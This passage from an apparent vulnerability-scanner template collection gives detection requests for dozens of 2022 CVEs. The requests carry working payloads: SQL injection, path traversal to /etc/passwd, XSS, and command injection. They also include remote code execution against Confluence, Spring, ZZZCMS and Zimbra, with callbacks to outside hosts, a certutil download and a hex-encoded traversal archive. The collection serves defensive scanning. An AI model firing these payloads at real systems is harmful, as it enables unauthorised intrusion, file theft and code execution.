Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-32430","info":{"name":"Lin CMS Spring Boot - Default JWT Token","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/admin/group/all"],"headers":{"Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"level\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]},{"type":"word","part":"body","words":["<html","<body","<script"],"negative":true}]}]},{"id":"CVE-2022-0787","info":{"name":"Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'iTotalDisplayRecords')"],"condition":"and"}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(7)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["p1_network_mail.cgi"]}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40oast.me&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-38322","info":{"name":"Temenos Transact - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setupHelp('')\" onerror=\"confirm('document.domain')"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm('document_domain')</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>confirm('document_domain')</script>","Existing backups"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0087","info":{"name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/signin?from=https://interact.sh","{{BaseURL}}/signin?from=javascript:alert(document.cookie)"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"word","part":"body","words":["alert(document.cookie)"]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc1}}&hfoo={{cmd}}&hhook=array_map\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc2}}&hfoo={{cmd}}&hhook=array_map\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a